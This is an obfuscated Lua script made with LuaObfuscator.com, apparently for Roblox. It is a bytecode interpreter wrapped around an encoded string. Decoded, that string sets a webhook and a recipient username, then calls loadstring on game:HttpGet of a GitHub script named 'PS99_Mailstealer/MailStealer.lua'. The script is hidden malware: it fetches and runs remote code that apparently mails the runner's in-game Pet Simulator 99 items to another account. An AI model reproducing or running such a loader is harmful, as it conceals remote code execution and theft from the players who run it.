--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v108=0;local v109;while true do if (v108==1) then return v109;end if (v108==0) then v109=v5(v86,v19);v19=nil;v108=1;end end else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((1 + 1)^(v32-((1 + 1) -1))))%((5 -(880 -(282 + 595)))^(((v33-((1638 -(1523 + 114)) -(0 + 0))) -(v32-(2 -(1 -0)))) + (620 -(555 + 64)))) ;return v87-(v87%(932 -(857 + 74))) ;else local v88=(570 -(367 + 201))^(v32-1) ;return (((v31%(v88 + v88))>=v88) and (928 -(214 + 713))) or 0 ;end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=4 -(7 -4) ;end if (v34==(958 -(892 + 65))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v37 * (606 -(87 + 263))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 4 ;return (v41 * (12302277 + 4474939)) + (v40 * (160901 -(379026 -283661))) + (v39 * (189 + 67)) + v38 ;end local function v24() local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(954 -(802 + 150))) then v47=v20(v44,21,83 -52 );v48=((v20(v44,57 -25 )==(1 + 0)) and  -(998 -(915 + 82))) or (2 -1) ;v42=2 + 1 ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=(2674 -(998 + 488)) -(1069 + 118) ;end if (v42==(6 -3)) then if (v47==(0 -(0 + 0))) then if (v46==(0 + 0 + 0)) then return v48 * 0 ;else v47=1;v45=(772 -(201 + 571)) -0 ;end elseif (v47==(2031 + 16)) then return ((v46==(791 -(368 + 423))) and (v48 * (((1141 -(116 + 1022)) -2)/(18 -(10 + (33 -25)))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((7 -5)^(494 -(416 + 26))))) ;end if ((1 + 0)==v42) then v45=3 -(7 -5) ;v46=(v20(v44,(3 -2) + 0 ,35 -15 ) * (2^(470 -(145 + 293)))) + v43 ;v42=432 -(44 + 386) ;end end end local function v25(v49) local v50=0;local v51;local v52;while true do if (v50==(859 -((3854 -3040) + 45))) then v51=nil;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=1 + 0 ;end if ((1 + 0)==v50) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=887 -(103 + 158 + 624) ;end if (v50==(3 -1)) then v52={};for v110=1081 -(1020 + 60) , #v51 do v52[v110]=v2(v1(v3(v51,v110,v110)));end v50=1426 -(630 + 793) ;end if ((9 -6)==v50) then return v6(v52);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(function() return 0 -0 ;end)();local v90=(function() return;end)();local v92=(function() return;end)();while true do if (v89==(0 -0)) then local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();while true do if ((0 -0)==v116) then v117=(function() return 0 -0 ;end)();while true do if (v117==(0 + 0)) then v90=(function() return v91();end)();v92=(function() return nil;end)();v117=(function() return 1 + 0 ;end)();end if ((1 + 0)~=v117) then else v89=(function() return  #"{";end)();break;end end break;end end end if ( #"]"==v89) then if (v90== #",") then v92=(function() return v91()~=0 ;end)();elseif (v90==(653 -(494 + 157))) then v92=(function() return v93();end)();elseif (v90== #"xnx") then v92=(function() return v94();end)();end v95[v96]=(function() return v92;end)();break;end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v54=(function() return function(v97,v98,v99) local v100=(function() return 0 -0 ;end)();local v101=(function() return;end)();while true do if ((0 -0)~=v100) then else v101=(function() return 0;end)();while true do if (v101~=0) then else local v123=(function() return 0;end)();while true do if (v123==(0 -0)) then v97[v98-#"/" ]=(function() return v99();end)();return v97,v98,v99;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"|",v59 do FlatIdent_781F8,Type,v21,Cons,v24,v25,v60,v68=(function() return v53(FlatIdent_781F8,Type,v21,Cons,v24,v25,v60,v68);end)();end v58[ #"-19"]=(function() return v21();end)();for v69= #":",v23() do local v70=(function() return v21();end)();if (v20(v70, #" ", #"|")==(867 -(550 + 317))) then local v104=(function() return 0 -0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104==(3 -0)) then if (v20(v106, #"19(", #"19(")~= #",") then else v107[ #"http"]=(function() return v60[v107[ #"0313"]];end)();end v55[v69]=(function() return v107;end)();break;end if (1==v104) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 + 0)) then local v125=(function() return 285 -(134 + 151) ;end)();local v126=(function() return;end)();while true do if (v125~=(1665 -(970 + 695))) then else v126=(function() return 0;end)();while true do if (v126==0) then v107[ #"xxx"]=(function() return v22();end)();v107[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"}") then v107[ #"nil"]=(function() return v23();end)();elseif (v105==(1 + 1)) then v107[ #"91("]=(function() return v23() -((1 + 1)^16) ;end)();elseif (v105~= #"xnx") then else local v162=(function() return 836 -(660 + 176) ;end)();local v163=(function() return;end)();while true do if (v162==(0 + 0)) then v163=(function() return 0 -0 ;end)();while true do if (v163==(202 -(14 + 188))) then v107[ #"-19"]=(function() return v23() -((677 -(534 + 141))^16) ;end)();v107[ #"?id="]=(function() return v22();end)();break;end end break;end end end v104=(function() return 2;end)();end if (v104==2) then if (v20(v106, #"!", #":")~= #"<") then else v107[2]=(function() return v60[v107[2]];end)();end if (v20(v106,2 -0 ,2)~= #":") then else v107[ #"19("]=(function() return v60[v107[ #"91("]];end)();end v104=(function() return 3;end)();end if ((241 -(187 + 54))==v104) then local v122=(function() return 0;end)();while true do if (v122==(1 + 0)) then v104=(function() return 1 + 0 ;end)();break;end if (v122~=0) then else v105=(function() return v20(v70,2, #"xxx");end)();v106=(function() return v20(v70, #"asd1",6);end)();v122=(function() return 1 + 0 ;end)();end end end end end end for v71= #">",v23() do v56,v71,v28=(function() return v54(v56,v71,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[3 -1 ];local v67=v62[3 + 0 ];return function(...) local v72=v65;local v73=v66;local v74=v67;local v75=v27;local v76=1 -0 ;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -(1001 -(451 + 549)) ;local v81={};local v82={};for v102=0 + 0 ,v80 do if ((1222==1222) and (v102>=v74)) then v78[v102-v74 ]=v79[v102 + (2 -1) ];else v82[v102]=v79[v102 + 1 ];end end local v83=(v80-v74) + (1 -0) ;local v84;local v85;while true do local v103=0 -(0 -0) ;while true do if ((v103==(0 + 0)) or (2001<123)) then v84=v72[v76];v85=v84[1385 -(746 + 638) ];v103=1 + 0 ;end if (v103==1) then if ((98<2425) and (v85<=(8 -2))) then if (v85<=(343 -(218 + (164 -41)))) then if ((4715==4715) and (v85<=(1581 -(1535 + 46)))) then if (v82[v84[2 + 0 ]]==v84[1 + 3 ]) then v76=v76 + (561 -(306 + 254)) ;else v76=v84[3 + 0 ];end elseif (v85>(1 + 0)) then v82[v84[3 -1 ]]=v64[v84[3]];else v76=v84[1470 -(899 + 568) ];end elseif (v85<=((768 -(468 + 297)) + 1)) then if (v85>(1133 -(369 + 761))) then for v164=v84[(564 -(334 + 228)) + 0 ],v84[7 -4 ] do v82[v164]=nil;end else v82[v84[3 -1 ]]=v84[606 -(268 + 335) ]~=(290 -(60 + 230)) ;end elseif (v85==(7 -2)) then v82[v84[574 -(426 + 146) ]]=v84[219 -(42 + 174) ];else v64[v84[3 + 0 ]]=v82[v84[1 + 1 ]];end elseif (v85<=(1465 -(282 + 1174))) then if (v85<=(3 + 4)) then do return;end elseif ((4218==4218) and (v85>(1512 -(363 + 1141)))) then v82[v84[(2742 -1929) -(569 + 242) ]]();else local v141=0 -0 ;local v142;local v143;local v144;local v145;while true do if (v141==(0 + 0)) then v142=v84[5 -3 ];v143,v144=v75(v82[v142](v13(v82,v142 + 1 ,v84[1027 -(706 + 318) ])));v141=1252 -(721 + 530) ;end if (v141==(1273 -(945 + 326))) then for v204=v142,v77 do v145=v145 + (2 -1) ;v82[v204]=v143[v145];end break;end if (v141==((2 -1) + 0)) then v77=(v144 + v142) -(701 -((491 -220) + 122 + 307)) ;v145=0 -0 ;v141=2 + 0 ;end end end elseif (v85<=(1511 -(1408 + 92))) then if (v85>(1096 -(461 + 625))) then local v146=(1524 -(141 + 95)) -(993 + 295) ;local v147;while true do if (v146==0) then v147=v84[1 + 1 + 0 ];v82[v147]=v82[v147](v13(v82,v147 + (1172 -(418 + 753)) ,v77));break;end end else local v148=v84[(2 -1) + (2 -1) ];local v149=v82[v84[1 + 2 ]];v82[v148 + 1 ]=v149;v82[v148]=v149[v84[2 + 2 ]];end elseif (v85>(4 + 8)) then local v153=0;local v154;local v155;local v156;local v157;local v158;while true do if (v153==(13 -5)) then v84=v72[v76];v82[v84[531 -(406 + 123) ]]();v76=v76 + (1770 -(1749 + 5 + 15)) ;v84=v72[v76];v153=3 + 6 ;end if (v153==(310 -((668 -424) + 60))) then v77=(v156 + v158) -(1 + 0) ;v154=476 -(41 + 435) ;for v207=v158,v77 do v154=v154 + (1323 -(879 + 370 + 73)) ;v82[v207]=v155[v154];end v76=v76 + 1 + 0 + 0 ;v153=1152 -((655 -189) + 679) ;end if (v153==(21 -12)) then v76=v84[8 -5 ];break;end if ((v153==((1122 + 779) -(106 + 1794))) or (221<89)) then v64[v84[1616 -(1565 + (211 -(92 + 71))) ]]=v82[v84[1 + 1 + 0 ]];v76=v76 + 1 + (0 -0) ;v84=v72[v76];v82[v84[5 -3 ]]=v64[v84[7 -4 ]];v153=116 -(4 + 110) ;end if ((2054>=1421) and (v153==(591 -(57 + 527)))) then v84=v72[v76];v158=v84[767 -(574 + 191) ];v82[v158]=v82[v158](v13(v82,v158 + (1428 -(41 + 1386)) ,v77));v76=v76 + (104 -(17 + 86)) ;v153=6 + 2 ;end if (v153==(0 -0)) then v154=nil;v155,v156=nil;v157=nil;v158=nil;v153=2 -1 ;end if (v153==(171 -(122 + 37 + 7))) then v76=v76 + (1 -0) ;v84=v72[v76];v158=v84[6 -4 ];v155,v156=v75(v82[v158](v13(v82,v158 + 1 + 0 ,v84[1 + 2 ])));v153=11 -5 ;end if ((692<3058) and (v153==(69 -(30 + 35)))) then v82[v158]=v157[v84[3 + (2 -1) ]];v76=v76 + (1258 -(533 + 510 + 214)) ;v84=v72[v76];v82[v84[7 -5 ]]=v84[1215 -(323 + 889) ];v153=5;end if ((v153==(5 -3)) or (3254==1655)) then v76=v76 + (581 -(361 + 219)) ;v84=v72[v76];v82[v84[(850 -(254 + 595)) + 1 ]]=v64[v84[3]];v76=v76 + (321 -(53 + 267)) ;v153=1 + 2 ;end if ((v153==(416 -(15 + 398))) or (1296==4910)) then v84=v72[v76];v158=v84[984 -(18 + (1090 -(55 + 71))) ];v157=v82[v84[11 -8 ]];v82[v158 + 1 + 0 ]=v157;v153=(3 -0) + 1 ;end end else local v159=850 -(20 + (2620 -(573 + 1217))) ;while true do if ((1 + 0)==v159) then v76=v76 + ((351 -224) -(116 + 10)) ;v84=v72[v76];v64[v84[1 + 2 ]]=v82[v84[740 -(42 + 500 + 196) ]];v76=v76 + (1 -0) ;v159=(1 -0) + (940 -(714 + 225)) ;end if ((3368==3368) and (v159==(2 + 0))) then v84=v72[v76];v82[v84[1 + 1 ]]=v84[(26 -17) -6 ];v76=v76 + 1 + 0 ;v84=v72[v76];v159=7 -4 ;end if (v159==(7 -4)) then v76=v84[8 -5 ];break;end if ((2643<3815) and ((1551 -(1126 + 425))==v159)) then v64[v84[1208 -(902 + 303) ]]=v82[v84[407 -(118 + 287) ]];v76=v76 + (3 -2) ;v84=v72[v76];v82[v84[1123 -(118 + (1397 -394)) ]]=v84[8 -5 ]~=(377 -(142 + 235)) ;v159=4 -3 ;end end end v76=v76 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B030E3O00596F7572204C696E6B2048657265030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B692O75502F50532O395F4D61696C737465616C65722F6D61696E2F4D61696C537465616C65722E6C756103083O00557365726E616D6503103O00726973656F666E61746F696E5F70726F030A3O004C6F61645363722O656E001C3O0012053O00014O0004000100013O00264O0002000100010004013O00020001001205000100013O00262O00010011000100020004013O00110001001205000200043O00120D000200033O00122O000200053O00122O000300063O00202O00030003000700122O000500086O000300056O00023O00024O00020001000100044O001B000100262O00010005000100010004013O000500010012050002000A3O00120C000200096O000200013O00122O0002000B3O00122O000100023O00044O000500010004013O001B00010004013O000200012O00073O00017O00",v9(),...);
